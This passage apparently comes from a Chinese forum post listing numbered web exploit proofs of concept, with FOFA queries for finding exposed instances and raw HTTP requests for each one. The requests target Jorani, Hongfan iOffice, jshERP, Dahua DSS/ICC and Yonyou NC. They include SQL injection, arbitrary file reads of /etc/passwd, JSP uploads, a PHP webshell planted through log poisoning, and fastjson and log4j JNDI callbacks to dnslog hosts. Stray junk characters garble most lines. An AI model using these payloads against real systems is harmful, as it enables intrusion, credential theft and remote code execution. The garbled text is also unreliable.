' M2 y. u! R+ E3 H8 v# WGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
1 h& _7 F7 n. g* d" NHost: 127.0.0.10 [! F# x. C4 l& ~7 M
Pragma: no-cache8 K$ ^( D+ _3 g
Cache-Control: no-cache
9 a1 G6 G( I5 ~  u0 Z  b# vUpgrade-Insecure-Requests: 1) u7 o$ q& V, D3 i+ z, [' y# p. K6 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 F; v9 j3 X. n9 |# ^0 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: y( v+ a/ Q+ b' k% r# ]
Accept-Encoding: gzip, deflate
7 g" g9 G( J% c7 q1 {% r# eAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ p2 Z1 D1 U6 G: l' `4 ~$ mConnection: close$ T5 t, k4 t7 Q% w/ t- I( D* z
/ n% m! z6 L* k
7 Z7 B4 x' g, F! L7 S3 n) ~
12. Jorani < 1.0.2 远程命令执行
1 D; E8 k# R: r+ w+ X8 kFOFA:title="Jorani"+ q" Q$ J$ C& ?  D( o' l
第一步先拿到cookie% p: B+ t( K( C/ `$ A& G+ S! _
GET /session/login HTTP/1.1
; Q/ B/ Y) P$ V5 h- IHost: 192.168.190.30
0 s1 j/ ~4 W9 a2 M$ N/ q, U4 pUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.367 o2 B# _5 ^  I- ^9 P* m5 O6 ]
Connection: close5 K6 U, I. v1 q1 ?6 j& ^0 I
Accept-Encoding: gzip* N( Y% p$ z! J5 V3 v* V
  ^8 m* Y5 h1 l- J( E
/ ?9 Z% s5 E- A
响应中csrf_cookie_jorani用于后续请求/ }- z0 l2 j8 d9 \* S0 k! t
HTTP/1.1 200 OK9 i  p" z6 _+ x
Connection: close
0 H+ o% w, h# ?" ?  N+ g" k# o( u: ACache-Control: no-store, no-cache, must-revalidate
# p! b: B2 C+ k7 M: u1 E& ?4 {Content-Type: text/html; charset=UTF-8; P$ ^% T; X# Z4 m# g( v
Date: Tue, 24 Oct 2023 09:34:28 GMT
3 m# M+ r  P+ V! \' vExpires: Thu, 19 Nov 1981 08:52:00 GMT
# m) s  }; q" Z0 y! q# l2 |- ^5 L4 KLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT+ {7 l3 d$ N! p$ y! B# n" C
Pragma: no-cache
7 |  U! x" ]  p( [  y! Z' wServer: Apache/2.4.54 (Debian)
$ `8 p* k. [# G$ B, y% |Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/1 o$ l+ F6 ?: T) k2 N
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
! A) j! z5 `: k, o- U8 fVary: Accept-Encoding
9 k( r7 X! M3 d  d* `# R7 F
3 `) f$ I" X# N! i, f
8 E; E& @' ^3 [% q: `7 _3 i7 `0 VPOST请求,执行函数并进行base64编码  t5 Y7 ^( I* t2 d2 x' E1 c
POST /session/login HTTP/1.1
1 Q2 A% A. F% y5 sHost: 192.168.190.30* w% g) |% r5 p. W9 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
! h7 H7 s1 y+ q; y0 QConnection: close( n" Y0 h# W& K6 R4 P; l$ p7 F
Content-Length: 252
! D% ~5 l+ o% V, J9 }0 OContent-Type: application/x-www-form-urlencoded
! L9 Y0 s; f* n- VCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r8 N9 z8 o/ k* P0 U9 m2 p9 Z
Accept-Encoding: gzip
9 @: V& L; j0 D6 Y9 M- }  p  j* O
7 C1 R) d: k6 l6 L  c- dcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor4 w9 w, x) R* n; H
9 o0 o7 R, f8 ^. f/ X! i8 ~
% k$ z" P5 y, |1 K

+ H! X. k, S7 C- ^1 @8 b- ]向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串8 K3 O9 E. A2 D1 O
GET /pages/view/log-2023-10-24 HTTP/1.1
% o% i0 J& j( A) F9 g1 G" s$ A6 ?Host: 192.168.190.30
# }0 N0 ~7 V+ E5 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# P  g/ e  T2 g$ `8 mConnection: close
, A0 t5 K, ?8 G$ S, ]5 vCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
3 U! |, m+ n6 I: x1 G: s* p# SK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=8 Y6 Q$ n$ f& Z' t4 p( b6 c* i
X-REQUESTED-WITH: XMLHttpRequest
$ a' V- N0 t7 RAccept-Encoding: gzip7 _. X8 {* q: N' k! R* [

# Y/ [/ _- a7 ~- |; M
* Y$ T5 q; J9 W- W. f6 h13. 红帆iOffice ioFileDown任意文件读取
: Z4 T! }- B; Z! rFOFA:app="红帆-ioffice"
" @% G6 ?# C$ h6 UGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
  t( ]4 Q" s- I) m3 X0 MHost: x.x.x.x* A, K  H8 i) a& X3 a+ Q1 P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 o% T  u. P% Q+ T, I' T/ @Connection: close
- M; ^+ ]3 @# p4 vAccept: */*# @5 S/ P, A& F$ Z
Accept-Encoding: gzip$ m2 j& w( e5 ?% H" L7 C: k
* Z- r- R" s% L! Q3 Q- M

$ }# Y* m7 t4 A; E# a/ u( M6 q14. 华夏ERP(jshERP)敏感信息泄露
4 G2 R( x/ m4 M, j1 dFOFA:body="jshERP-boot"
% X# C( R) w9 W: W8 R+ Q8 s4 w泄露内容包括用户名密码
$ B9 o/ m& A- w5 p7 v( X% BGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
$ |+ ^( c# w- SHost: x.x.x.x
$ P$ `; A. _0 w; n0 k. q9 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.362 Z; E3 S# b( v- o# y2 _  K
Connection: close
% G! O9 ?9 l  ?  Z- {Accept: */** k+ b" V5 g5 w% j
Accept-Language: en
1 t/ l8 }% S6 F) s3 G/ P# ]8 lAccept-Encoding: gzip6 b9 r2 @0 I; G8 Q4 D" A

9 L9 v( H0 G( {8 a' s* n. F/ v8 d. U7 }8 r" }7 h; ?
15. 华夏ERP getAllList信息泄露3 x& A+ Z1 y" M/ h7 C# u# x# a
CVE-2024-0490
+ _2 M/ i" R: j7 t! b1 rFOFA:body="jshERP-boot"
8 j3 p) ?7 B$ v0 [) q泄露内容包括用户名密码6 E3 |& d1 Z- @& m0 X& L4 u2 N! d
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1' A6 n5 G; P- `# ?4 B7 L$ |
Host: 192.168.40.130:1001 B9 t  D1 X, m6 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
( k9 H2 y. o4 Q+ [/ jConnection: close0 X4 X# n: D$ Q9 a6 Z8 q% ]
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8, Z* v4 T4 Q" a8 J! r
Accept-Language: en0 k4 N6 S# v' @2 ~( V& H* z+ A
sec-ch-ua-platform: Windows; S" l1 d& u+ y( E4 W7 |$ f
Accept-Encoding: gzip8 i- Z4 Q0 j+ O: l0 P( @
; C, q( T, |3 J- X8 B7 v
4 \5 e" q+ ^; [- }" [5 x# ?
16.  红帆HFOffice医微云SQL注入5 ]$ y# G) Z* ]. |: h
FOFA:title="HFOffice"% m5 K! f# x4 a: @8 M% w. \9 j6 o
poc中调用函数计算1234的md5值) s2 |$ C6 N5 c: b5 W6 z3 `8 m
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 c( ~% w7 Y& L5 b, m6 d3 z
Host: x.x.x.x/ ~& m7 V! G- P" n1 s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# v2 e" R3 V+ l. S% H  q& p
Connection: close
7 i! W3 I- ^$ ?/ g: x1 ~; FAccept: */*
2 G: E- e- e2 d' a# u$ V: XAccept-Language: en0 e6 \  ]8 i( e2 K" Y: G
Accept-Encoding: gzip
1 n: o, c3 C/ i! c" v! S$ [* v; ?

0 V- n' b8 }) B2 o: ?5 A+ m17. 大华 DSS itcBulletin SQL 注入/ I* c' m  _9 f
FOFA:app="dahua-DSS"
3 \2 v% X! V8 r9 \POST /portal/services/itcBulletin?wsdl HTTP/1.1; Y  R; o6 C0 ]/ O/ b
Host: x.x.x.x
3 q! j" ^. H( F$ q2 X. `0 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 J8 _- h1 F/ s) g$ b& JConnection: close
" G' N5 V& m& K( z3 L7 R( qContent-Length: 345
: ~- [4 R! v7 Q' QAccept-Encoding: gzip$ \; H- C5 C* K- s
  V4 X0 J" U( e, u
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>0 B4 H& u0 Q7 v4 W1 n: `
<s11:Body>0 Q+ ~+ M8 o. E7 F
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>. Z  U; I$ o0 Q5 R' ~! }  \; |
      <netMarkings>
' @  Q" @9 B5 C' v0 U/ d& N* Y       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1" n1 \% V$ M' x: q! Z' d, D
      </netMarkings>
9 X2 a. z0 E6 J    </ns1:deleteBulletin>
5 S8 b! N& n5 O5 Y( Q8 a2 k+ Y  </s11:Body>
! Z) y, F6 o! l$ h! |</s11:Envelope>
. u2 X- p7 ]  Q) q3 Q) J. W" Y$ Q/ S
6 o3 W2 Q1 k! t3 g# J% v9 N9 D, x; U& L: d
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露. z3 n: y: F' u  r" R. G, c% O7 C
FOFA:app="dahua-DSS"8 y8 u6 B& d% P
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
* R1 R% _; X* Y6 E) m! {( g" A. qHost: your-ip
- }- c  l( ?4 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 e* d- I. T+ t0 bAccept-Encoding: gzip, deflate
- h& k( i5 O8 {0 v  c. `Accept: */*. q# p% S. ]2 F) V3 |+ y0 D7 O3 f0 b
Connection: keep-alive
( F2 ]$ C$ N+ {1 t( w8 O( Q, u" B; _, i6 _6 ^+ d7 G
. y9 l- w% d3 e+ i0 K# ]

3 ]$ C! A* |2 Q7 L5 ]19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
2 N  N4 \6 J, aFOFA:app="dahua-DSS"/ Q, w7 ^* y$ w( `, j
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
; U3 |( \3 U9 i' Y/ yHost:
2 h4 ^6 D- e; vUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 J+ s, e5 w+ m! J- v
Accept-Encoding: gzip, deflate( F: W2 b4 [- q+ i& Z" X& M
Accept: */*/ q" f% K4 d9 t, j
Connection: keep-alive8 m% z  P- x3 L- L7 p+ [

7 m2 _3 L5 }5 z0 y" q6 I! A, P
' f9 `" n8 N" l! N; {* U9 p20. 大华ICC智能物联综合管理平台任意文件读取. p% ~0 d  j8 E7 L; h7 [  ^
FOFA:body="*客户端会小于800*"
$ v  p" L  _0 T6 [GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
& K/ n& [0 r. z4 _Host: x.x.x.x
9 o# Q1 c, W4 F  B" XUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, `4 b" h& R# |/ E8 U  a* l
Connection: close
. ?7 e3 K: Y7 i! DAccept: */*, V  G5 `2 F6 h+ P
Accept-Language: en
$ L) e) c- K4 v& t" b: _% |1 f$ q+ {& RAccept-Encoding: gzip1 y$ v' A+ |/ l. H- N: i

0 B, D" g8 k# r* T0 v3 N9 s2 ^$ p- B/ X5 E0 ]! i2 ]
21. 大华ICC智能物联综合管理平台random远程代码执行: d& _' p, U; H) a7 d6 r
FOFA:icon_hash="-1935899595"
8 {5 Y' O0 y8 [) c+ n" ?POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
& [& a! Q. ]9 l. Z! PHost: x.x.x.x' `) x: g' ?' o, R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 W* t, C% t, N. CContent-Length: 1616 \- y6 q7 Z) G6 r
Accept-Encoding: gzip
1 Y3 Q1 U) {! \3 q, |  h9 @% iConnection: close
: }  e6 G( f! L5 i: S  GContent-Type: application/json;charset=utf-8
2 @0 j( N) ^  r6 u
/ c) R- V5 D0 [' _6 \* ]9 j{
( E7 F- S+ ]4 y# D"a":{
0 N4 Y' F8 Q3 |8 ?0 ?' j   "@type":"com.alibaba.fastjson.JSONObject",- f! g) F$ [2 t/ k" J  A8 V3 o
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}  F% W1 R- ]3 L3 n; z! r: C
  }""
1 K3 H8 |1 f1 ^" r* u}
" o4 t- n8 ]5 u( a) w  z4 z" ?) M5 W# E6 f& ]" ~$ m1 {  v) u7 L8 E+ r
! k6 P$ Z& }5 C- `9 C
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
) @' U2 r. Z/ Y9 E+ X) ?FOFA:icon_hash="-1935899595"# Q- Y$ U7 S* K. w( o) j- d" Q& s
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.15 `9 G# Q' x7 G7 v
Host: your-ip" E- ~6 ^* m8 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
, ^# @( U- [! W, |Content-Type: application/json;charset=utf-8
5 p( a' t, a8 \, Y" `8 m
' Y/ D+ |) C& u, Z{
  Q) X$ y5 f+ B# ^6 }) {"loginName":"${jndi:ldap://dnslog}"
/ k6 ]0 D7 c; ]: ^) H* v. @}
# g7 @1 o! z* ~' G, l, s! ^) r6 d  I4 ^7 e% v3 @
6 ^8 I- H$ l  l: m( A9 x

+ |( c/ q, O/ |1 S* x3 F23. 大华ICC智能物联综合管理平台 fastjson远程代码执行  {/ Y& p: _' o3 K
FOFA:icon_hash="-1935899595". o  f* O; L& Q; k" _
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
7 q: N. \/ q  ^Host: your-ip
, L0 e+ a, l1 k, y; R, Q  m* c. M- p& tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* \9 N/ l6 g+ p5 c
Content-Type: application/json;charset=utf-8: m) |5 d) t* ~# }$ D* C
Accept-Encoding: gzip
7 T; `8 f, R" B+ A4 o# E4 f5 yConnection: close4 L! j" I/ v0 W* i. ]0 j
, Q& ~" d5 z& e5 s' A
{
6 ~. R9 f# H; |6 L7 w* e( ~    "a":{: P( X8 F/ S; u" R& j
        "@type":"com.alibaba.fastjson.JSONObject",; H5 r% Q6 p# o; n, s
       {"@type":"java.net.URL","val":"http://DNSLOG"}5 }# ~0 h) e" U6 i* N6 D
        }""9 p: e0 Y7 \" L# t7 D" Q
}
0 }. M. l8 A  J1 _
% X/ [$ \5 O, D  g% Y. \' y  f9 Z
: X) |+ m' T* e4 t9 q3 C& n; t24. 用友NC 6.5 accept.jsp任意文件上传+ g# g9 x8 O6 \" x( O3 c2 T
FOFA:icon_hash="1085941792"
7 b% p' R4 w( V- w. @' c* g: i, mPOST /aim/equipmap/accept.jsp HTTP/1.1  e6 J1 J, t# _; e
Host: x.x.x.x- o2 g, q+ ]1 {7 Z
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36- j( t) x, f. _* i( m
Connection: close
) n: d: Z! C; NContent-Length: 449
) [7 t) P% W; {6 {% ]" F% wAccept: */*
. M( B' m1 }  N1 UAccept-Encoding: gzip
$ [/ y% k: \2 zContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc0 s/ L0 M% I" }  `9 j; C( ?
, N! U$ U, B+ ~
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc6 @8 Y- P7 U8 y- G9 a# N9 [
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
1 S" T0 _+ d$ E4 |Content-Type: text/plain' U' e8 v6 \8 g) l& w- ]" U+ `

1 `9 K( O- A5 s/ g# w) P: g1 A4 w1 e<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
) m8 P9 e! `# r, Q) ~-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
. R/ |! D& t6 sContent-Disposition: form-data; name="fname"  Z8 t' |0 U/ v; X

8 ~; B* W2 m* |; C+ S1 t  ~; _( p\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp( p1 f2 [4 g; Z$ J. Q% x( R3 w5 q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--- a& Z9 }% f. p! B

2 {7 t6 s( i1 h+ p) M( S* {
+ ?3 p: Z8 g) q0 m" K. N25. 用友NC registerServlet JNDI 远程代码执行4 n, J: ~$ a7 r) [) s4 F
FOFA:app="用友-UFIDA-NC"1 M2 ]8 Y2 E' |# ~& K& h: r: e$ a
POST /portal/registerServlet HTTP/1.1
: t9 D  R6 {) AHost: your-ip* W7 o1 S' \- |5 n1 ?) y; [' F$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
# P6 x* E8 c, S' R: u$ A+ q0 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
% b6 `9 K5 d" W" K, |3 ]Accept-Encoding: gzip, deflate
2 X, s5 z, ?2 H" |9 c! G, rAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
- L! Q5 D$ C, b; H* D8 ~' iContent-Type: application/x-www-form-urlencoded
' I- O( y5 M* D+ y; `4 [. ]; u$ i" S# i4 o
type=1&dsname=ldap://dnslog* ~! E* U+ t2 \. ^: \9 ?
7 i" T  |6 D# Z4 L" x/ p

4 k) c% E+ b6 a8 O8 J8 F/ ~! Z. `8 h7 z5 T; A7 C/ M  q  R
26. 用友NC linkVoucher SQL注入
: q' q* S) u% tFOFA:app="用友-UFIDA-NC"
  r% E% ]7 g3 O2 C6 _6 `7 aGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
; ]/ u7 M+ _+ q8 Y" sHost: your-ip
' d' {! D% P1 r5 P* eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- f  S9 n6 `5 c/ A- @" QContent-Type: application/x-www-form-urlencoded
, Z3 F5 v! l5 ^/ i6 K+ A# `5 \# JAccept-Encoding: gzip, deflate1 i! _. _# w" n
Accept: */*4 Z3 z1 X4 @6 ?" O
Connection: keep-alive
6 m  B! @4 i* q2 F
2 Q* j' u- A$ v6 n, u8 e7 ?
( J; V. b8 h! C5 c* m: l& E27. 用友 NC showcontent SQL注入4 h2 Q3 U6 q5 P% B& i3 Y+ L
FOFA:icon_hash="1085941792"% m/ u+ m& |- C6 i
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
, x' Q& y( L8 p' z5 e6 HHost: your-ip" R$ b7 A" F/ }: v) e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, h& p& v% A; T2 x( R6 ^+ j  `: fAccept-Encoding: identity
  s' Q$ ~$ ?( ], e' oConnection: close) R2 s3 H: n6 N
Content-Type: text/xml; charset=utf-8
; z# K$ ?( }% |  V* D
  M% L& f0 @4 h/ V
3 F- S: r  v4 K1 S) `28. 用友NC grouptemplet 任意文件上传
9 U) w+ T) l- ~9 JFOFA:icon_hash="1085941792"# Y- g, _8 N9 i2 w) |
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
5 t4 a. f1 l( _' v8 O8 R. THost: x.x.x.x
! M: m, H1 }/ N1 f+ S' ?0 {. a9 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
( v) @: B) u" l+ p/ A; iConnection: close( j0 a0 X" u1 M* E: H. ]
Content-Length: 268* S' d7 @( e/ U, n+ u
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk& c/ M4 N' M* Z# @
Accept-Encoding: gzip( b$ H( g# D5 ^
2 Q  b; a  G3 w7 X7 B
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
& f7 _6 w1 w- l6 _5 bContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"9 S+ Q5 _  \3 R+ t  ~
Content-Type: application/octet-stream& {$ [4 R4 Q5 M/ S
# u! S( ^* L& ]% b' t
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>' }& ^% V7 C; Z* \2 A) [
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--/ v8 C# Y, @( e/ u/ T
* ?) v7 X) z! ]) W" L) Z! H* u

$ e/ N1 y4 @" Z& Q/uapim/static/pages/nc/head.jsp
( @' m& C# D9 `- g) G& s) n, q4 V
. L) O& @9 e/ _3 [29. 用友NC down/bill SQL注入2 P) R: ^& D1 C9 D- v
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"2 |& l& v6 T5 g* a: S
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.19 l0 ^: {8 v1 T2 `/ v) t# _
Host: your-ip6 r/ p8 h& H; Y6 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 |' z/ Q: [9 }. R/ W1 X3 P2 DContent-Type: application/x-www-form-urlencoded
0 S% U2 ?' [. xAccept-Encoding: gzip, deflate) O3 W# e/ N- \  _" L
Accept: */*
$ d! H7 v2 u  D9 C& f) j  IConnection: keep-alive
; M1 ]' d7 a2 J
- o2 Q7 n+ G" L3 u# E* s& S$ T" M: V
30. 用友NC importPml SQL注入" Q- T! a& {+ Q1 _" a
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; T: l( J, i; p* ]6 ^- e& E2 vPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1( C2 B5 G# p5 a+ G& G0 C$ U8 T1 v
Host: your-ip. b" _2 d: g1 j% X  t: C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V3 G2 M2 \8 j, d( l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ K. K/ o! }2 i! s6 u0 G$ ~3 j9 LConnection: close
0 k9 a* x, a; }7 L" U; s
% _. r  R, K7 v) v------WebKitFormBoundaryH970hbttBhoCyj9V
4 r; L1 I8 I+ a2 QContent-Disposition: form-data; name="Filedata"; filename="1.jpg"5 R" ^: L# M, i% g
Content-Type: image/jpeg- \! z0 s, t6 x/ w3 Q
------WebKitFormBoundaryH970hbttBhoCyj9V--
; A+ ^! M4 m# O. f5 q2 D: O/ L% `' m5 `! E
: ^) K- L, p/ j/ z0 w& W
31. 用友NC runStateServlet SQL注入
. |4 S, G0 i% j5 q. q  C2 w; Wversion<=6.5
+ e' P# C) {; c- a5 U% dFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& l) u. ~0 g( `8 e7 b
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1, ?9 w3 _: ]- U, ^3 w! Y
Host: host
3 U+ ?" }! t& h4 y2 p$ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.363 P8 L- N( V' E$ V
Content-Type: application/x-www-form-urlencoded
" L' J+ N* Z5 {3 i: D% ?4 M
$ Q8 s! t" q8 L' ~6 u# w6 C+ s
- n+ }. x0 c, n, {32. 用友NC complainbilldetail SQL注入
3 z/ P1 X$ P- w: e& oversion= NC633、NC656 V# n/ s1 v3 i* O- H+ U5 t
FOFA:app="用友-UFIDA-NC") f- v! k9 i2 z" O9 P/ I- T7 B
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.18 b8 b6 S- }* ?5 m# R6 i8 @* A
Host: your-ip( _' ~, m6 G+ i( |4 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: h/ G0 [/ T3 }2 qContent-Type: application/x-www-form-urlencoded! D1 ?9 s& \! C7 e! B
Accept-Encoding: gzip, deflate
) c( g* [; Y2 s. ~- s4 KAccept: */*& n# Y5 p/ W+ c4 v6 ?+ z; s+ m9 Q
Connection: keep-alive
! l+ ^% V# e5 L: s4 f' V, E
7 A+ q, V+ ~+ X. A
/ W, [) k( z8 h. M* a" p/ J7 f33. 用友NC downTax/download SQL注入5 }5 X# v+ J2 C0 E! X
version:NC6.5FOFA:app="用友-UFIDA-NC"4 o! S2 Z- m0 `2 E
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1  L* A3 i; f# A; }# I5 x, i5 z% u
Host: your-ip
/ }1 Q# U- v6 j- x7 \. P: WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) D, j$ b, }* _& g1 R1 D4 O
Content-Type: application/x-www-form-urlencoded1 c2 I* N5 v% h' B) L
Accept-Encoding: gzip, deflate/ [1 |7 \" A- Q& C' d
Accept: */*
2 i. ]0 }. l* H; n5 `" j. ]) R' hConnection: keep-alive: W+ v, i. X( G) w2 M+ H
  X5 q3 j/ R# k

& a- A) J# r2 ]" L' w34. 用友NC warningDetailInfo接口SQL注入% D2 Q: F% n8 U5 \' |
FOFA:app="用友-UFIDA-NC"
0 S; h7 E9 L/ K! IGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1) G0 N( u8 t# j( l  d
Host: your-ip
0 D+ S, b) X  c4 H3 s" z, q! M1 ~2 v4 k. uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; _- P  d. x& W" t& J
Content-Type: application/x-www-form-urlencoded& Y" |- ?" R: u7 k: W4 D
